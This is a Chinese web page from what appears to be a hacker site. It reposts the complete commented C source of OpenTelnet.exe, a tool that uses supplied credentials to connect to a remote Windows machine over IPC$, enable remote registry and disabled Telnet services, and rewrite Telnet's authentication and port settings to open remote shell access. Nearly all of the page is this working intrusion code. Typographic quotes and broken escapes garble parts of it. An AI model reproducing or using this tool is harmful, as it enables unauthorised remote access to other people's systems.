作品发布     邀请码    设为首页  收藏 

当前位置:文章编程 → 文章内容 >> opentelnet.exe 源代码


opentelnet.exe 源代码

更新时间:2012-2-18 15:45:46   作者:华中帝国整理  来源:华中帝国
opentelnet.exe 源代码——————————————————————————————// OpenTelnet.exe \\\\server username password NTLMAuthtelnetport #include <stdio.h>#include <assert.h>#includ ...

opentelnet.exe 源代码
——————————————————————————————
// OpenTelnet.exe \\\\server username password NTLMAuthtelnetport
#include <stdio.h>
#include <assert.h>
#include <windows.h>
#include <Winnetwk.h>
#include <Winreg.h>
#include <Shlwapi.h>

#pragma comment(lib, “Advapi32.lib”)
#pragma comment(lib, “Mpr.lib”)

SC_HANDLE g_schSCManager;
HKEY g_hKey;
DWORD g_DefaultTelnetStartType;
DWORD g_DefaultRegistryStartType;
LPBYTE g_lpDefaultTelnetNTLM;
LPBYTE g_lpDefaultTelnetPort;

void Usage(char*);
int RestartTelnet();
int StartRemoteRegistry();
int MyStartService(SC_HANDLE, char*);


int main(int argc, char* argv[])
{
int nRetCode;
char szIpc[50] = “”;
HKEY hKey;
LPSTR lpUserName, lpPassword;
NETRESOURCE NET;

DWORD dwNTLM, dwTelnetPort;

Usage(argv[0]);    //显示欢迎及帮助信息
if (argc < 5)
return 0;

sprintf (szIpc, “%s\\\\ipc$”, argv[1]);
lpUserName = argv[2];   //用户名
lpPassword = argv[3];   //密码

NET.lpLocalName = NULL;
NET.lpRemoteName = szIpc;
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;

printf (“Connecting %s”,argv[1]);

ReConnect:

//清除与目标已经建立的IPC连接
nRetCode = WNetCancelConnection2(szIpc, CONNECT_UPDATE_PROFILE, TRUE);
if (nRetCode == NO_ERROR)
printf (“Canncel Successfully!\”);

//与目标建立IPC连接
nRetCode = WNetAddConnection2(&NET, lpPassword, lpUserName, CONNECT_INTERACTIVE);
if (nRetCode == ERROR_ALREADY_ASSIGNED || nRetCode == ERROR_DEVICE_ALREADY_REMEMBERED)
{
printf (“Already conneted to the server!\”);
printf (“Now re-connecting the server\”);
goto ReConnect;    //如果已经有了IPC连接,则返回ReConnect继续尝试
}
else if (nRetCode == NO_ERROR)
printf (“Successfully!\”); //建立连接成功
else
{
printf (“\\\tErr:”);
switch (nRetCode)        //错误处理
{
case ERROR_ALREADY_ASSIGNED:


case ERROR_ACCESS_DENIED:
   printf (“ERROR_ACCESS_DENIED\”);
   break;
case ERROR_BAD_NET_NAME:
   printf (“ERROR_BAD_NET_NAME\”);
   break;
default:
   printf (“CONNECT ERR:%d!\”,GetLastError());
   break;
}
return 0;
}

//打开目标的服务控制管理
g_schSCManager = OpenSCManager(argv[1], NULL, SC_MANAGER_ALL_ACCESS);
if (g_schSCManager == NULL)
{
printf (“Open SCManager failed!\”);
return 0;
}

//打开远程注册表服务
if (!StartRemoteRegistry())
{
printf (“All Process Failed!\”);
return 0;
}

//连接远程注册表
if (!(RegConnectRegistry((LPCTSTR) argv[1], HKEY_LOCAL_MACHINE, &g_hKey) == ERROR_SUCCESS))
{
printf (“Connect remote registry failed!\”);
return 0;
}

//打开telnet服务的注册表键值
if (!(RegOpenKeyEx(g_hKey, “SOFTWARE\\\\Microsoft\\\\TelnetServer\\\\1.0”, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS))
{
printf (“Open key failed!\”);
return 0;
}

//读取注册表中telnet的原始值NTLM和Port
g_lpDefaultTelnetNTLM = (LPBYTE) LocalAlloc(LPTR, 50);   //分配空间
g_lpDefaultTelnetPort = (LPBYTE) LocalAlloc(LPTR, 50);
DWORD dwDataSize = 50;
//将NTLM键值读取到已分配空间的g_lpDefaultTelnetNTLM中,默认为2,这是为了恢复telnet的目的做的
if (!(RegQueryValueEx(hKey, “NTLM”, NULL, NULL, g_lpDefaultTelnetNTLM, &dwDataSize) == ERROR_SUCCESS))
{
printf (“Read NTLM failed!\ ”);
return 0;
}
//将TelnetPort键值读取到g_lpDefaultTelnetPort中,默认为23,这是为了恢复telnet的目的做的
if (!(RegQueryValueEx(hKey, “TelnetPort”, NULL, NULL, g_lpDefaultTelnetPort, &dwDataSize) == ERROR_SUCCESS))
{
printf (“Read port failed!\ ”);
return 0;
}

//编辑NTLM和端口值
dwNTLM = atoi(argv[4]);
if (dwNTLM >= 3)
{
dwNTLM = 1;
}
dwTelnetPort = atoi(argv[5]);

//设置NTLM的键值
if (!(RegSetValueEx(hKey, “NTLM”, 0, REG_DWORD, (LPBYTE) &dwNTLM, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set NTLM value failed!”);
return 0;
}

//设置端口值
RegSetValueEx(hKey, “TelnetPort”, 0, REG_DWORD, (LPBYTE) &dwTelnetPort, sizeof(DWORD));

//重启动telnet服务
nRetCode = RestartTelnet();

if (nRetCode)
{
printf (“\BINGLE!!!Yeah!!\”);
printf (“Telnet Port is %d. You can try:\\”telnet ip %d\\“, to connect the server!”, dwTelnetPort, dwTelnetPort);
}

//现在已经开启了telnet服务,添加几个键值来保存修改以前的注册表设置,可以用resumetelnet来恢复
if (!(RegSetValueEx(hKey, “default_NTLM”, 0, REG_DWORD, g_lpDefaultTelnetNTLM, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultNTLM value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_Port”, 0, REG_DWORD, g_lpDefaultTelnetPort, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultPort value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_TelnetStart”, 0, REG_DWORD, (LPBYTE) &g_DefaultTelnetStartType, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaulttelnetstart value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_RegistryStart”, 0, REG_DWORD, (LPBYTE) &g_DefaultRegistryStartType, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultregistrystart value failed!”);
return 0;
}

RegCloseKey(hKey);
RegCloseKey(g_hKey);   //关闭打开的注册表键

//关闭服务控制管理SCManager
CloseServiceHandle(g_schSCManager);

//断开远程ipc连接
printf (“\Disconnecting server”);
nRetCode = WNetCancelConnection2(argv[1], CONNECT_UPDATE_PROFILE, TRUE);
if (nRetCode == NO_ERROR)
printf (“Successfully!\”);
else
printf (“Failed!\”);

return 0;
}

void Usage(char* pcAppName)            //显示欢迎及帮助信息
{
printf (“*******************************************************\”);
printf (“Remote Telnet Configure, by samot\”);
printf (“Email: samot@mail.org\”);
printf (“%s\\”, pcAppName);
printf (“Usage:OpenTelnet.exe \\\\\\\\server username password NTLMAuthtelnetport\”);
printf (“*******************************************************\”);
return;
}

int RestartTelnet()                   //重启动telnet服务
{
DWORD     dwWaitTime;
DWORD     dwConfigSize;
SC_HANDLE    schTelnetService;
SERVICE_STATUS   ssTelnetStatus;
LPQUERY_SERVICE_CONFIG lpTelnetConfig;

printf (“\NOTICE!!!!!!\”);
printf (“The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23\\”);

//打开telnet服务
schTelnetService = OpenService(g_schSCManager, “TlntSvr”, SERVICE_ALL_ACCESS);
if (schTelnetService == NULL)
{
printf (“Open service failed!\”);
return 0;
}

lpTelnetConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (lpTelnetConfig == NULL)
{
printf (“Alloc memory failed!\”);
return 0;
}

//获取当前telnet服务的配置参数
if (!QueryServiceConfig(schTelnetService, lpTelnetConfig, 1024, &dwConfigSize))
{
printf (“Query service congfig failed!\”);
return 0;
}

//保存默认的telnet服务启动类型
g_DefaultTelnetStartType = lpTelnetConfig->dwStartType;

//将telnet服务的启动类型改为进程通过调用StartService来启动
if (lpTelnetConfig->dwStartType == SERVICE_DISABLED)
{
if (!ChangeServiceConfig(schTelnetService,
        SERVICE_NO_CHANGE,
        SERVICE_DEMAND_START,
        SERVICE_NO_CHANGE,
        NULL, NULL, NULL, NULL, NULL, NULL, NULL))
{
   printf (“Change service config failed!\”);
   return 0;
}
}

//获取当前telnet服务的状态
if (!(QueryServiceStatus(schTelnetService, &ssTelnetStatus)))
{
printf (“Query service status failed!\”);
return 0;
}

//如果telnet服务当前状态不是stop的话,停止服务
if (ssTelnetStatus.dwCurrentState != SERVICE_STOPPED && ssTelnetStatus.dwCurrentState != SERVICE_STOP_PENDING)
{
printf (“Stopping telnet service \”);
if (!(ControlService(schTelnetService, SERVICE_CONTROL_STOP, &ssTelnetStatus)))
{
   printf (“Control telnet service status failed!\”);
   return 0;
}

//sleep一段时间来等待telnet服务的停止
dwWaitTime = ssTelnetStatus.dwWaitHint / 10;
if( dwWaitTime < 1000 )
   dwWaitTime = 1000;
else if ( dwWaitTime > 10000 )
   dwWaitTime = 10000;

Sleep(dwWaitTime);
if (!QueryServiceStatus(schTelnetService, &ssTelnetStatus))
{
   printf (“Query service status failed!\”);
}

if ( ssTelnetStatus.dwCurrentState == SERVICE_STOPPED || ssTelnetStatus.dwCurrentState == SERVICE_STOP_PENDING)
{
   printf (“Telnet service is stopped successfully!\”);
}
else
{
   printf (“Stopping telnet service failed!\”);
   return 0;
}
}    //此时telnet服务已经成功停止

//调用MyStartService来重新启动telnet服务

if (!MyStartService(schTelnetService, “telnet”))
return 0;

CloseServiceHandle(schTelnetService);   //关闭服务句柄
return 1;
}

int StartRemoteRegistry()          //启动远程注册表服务
{
SC_HANDLE schRegistryService;
SERVICE_STATUS ssRegistryStatus;
LPQUERY_SERVICE_CONFIG lpRegistryConfig;
DWORD dwConfigSize;

lpRegistryConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (lpRegistryConfig == NULL)
{
printf (“Alloc memory failed!\”);
return 0;
}

//打开远程注册表服务
schRegistryService = OpenService( g_schSCManager, “RemoteRegistry”, SERVICE_ALL_ACCESS);
if (schRegistryService == NULL)
{
printf (“Open remote registry service failed!\”);
return 0;
}

//查询当前服务状态
if (!QueryServiceConfig(schRegistryService, lpRegistryConfig, 1024, &dwConfigSize))
{
printf (“Query registry service config failed!\”);
return 0;
}

//判断当前服务启动类型,如果是禁用则改变为通过StartService来启动服务
g_DefaultRegistryStartType = lpRegistryConfig->dwStartType;
if (g_DefaultRegistryStartType == SERVICE_DISABLED)
{
if (!ChangeServiceConfig(schRegistryService,
        SERVICE_NO_CHANGE,
        SERVICE_DEMAND_START,
        SERVICE_NO_CHANGE,
        NULL, NULL, NULL, NULL, NULL, NULL,NULL))
{
   printf (“Change registry service config failed!\”);
   return 0;
}
}

//查询服务状态
if (!QueryServiceStatus(schRegistryService, &ssRegistryStatus))
{
printf (“Query remote registry service failed!\”);
return 0;
}

//如果当前服务并没有启动,则调用MyStartService来启动
if (ssRegistryStatus.dwCurrentState != SERVICE_RUNNING)
{
if (!MyStartService(schRegistryService, “remote registry”))
   return 0;
}
CloseServiceHandle(schRegistryService);
return 1;
}

int MyStartService(SC_HANDLE schService, char* szServiceName)   //启动指定的服务
{
DWORD dwWaitTime;
DWORD dwOldCheckPoint;
DWORD dwStartTickCount;
SERVICE_STATUS ssStatus;

//调用StartService启动服务
printf (“Starting %s service\”, szServiceName);
if (!(StartService(schService, 0, NULL)))
{
printf (“Starting %s service failed!\”, szServiceName);
return 0;
}

//获取当前服务状态
if (!(QueryServiceStatus(schService, &ssStatus)))
{
printf (“Query %s service status failed!\”,szServiceName);
// return ;
}

    dwStartTickCount = GetTickCount();    //得到进程运行时间
    dwOldCheckPoint = ssStatus.dwCheckPoint;

while ( ssStatus.dwCurrentState == SERVICE_START_PENDING)
{
dwWaitTime = ssStatus.dwWaitHint / 10;
        if( dwWaitTime < 1000 )
            dwWaitTime = 1000;
        else if ( dwWaitTime > 10000 )
            dwWaitTime = 10000;

Sleep(dwWaitTime);

        //重新再查询状态

        if (!QueryServiceStatus(schService, &ssStatus))
            break;

        if ( ssStatus.dwCheckPoint > dwOldCheckPoint )
        {
            //服务启动中
            dwStartTickCount = GetTickCount();
            dwOldCheckPoint = ssStatus.dwCheckPoint;
        }
        else
        {
            if(GetTickCount()-dwStartTickCount > ssStatus.dwWaitHint)
            {
                //在建议等待的时间内服务没有启动
                break;
            }
        }
}

if ( ssStatus.dwCurrentState == SERVICE_RUNNING )
{
printf (“%s service is started successfully! %s service is running!\”, szServiceName, szServiceName);
}
else
{
printf (“%s service is not started!\”, szServiceName);
return 0;
}

return 1;
}

   免责声明:本文仅代表作者个人观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。

责任编辑:华中帝国        



本文引用网址: 

opentelnet.exe 源代码的相关文章
发表评论

用户名: 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 0分

内 容:

         (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码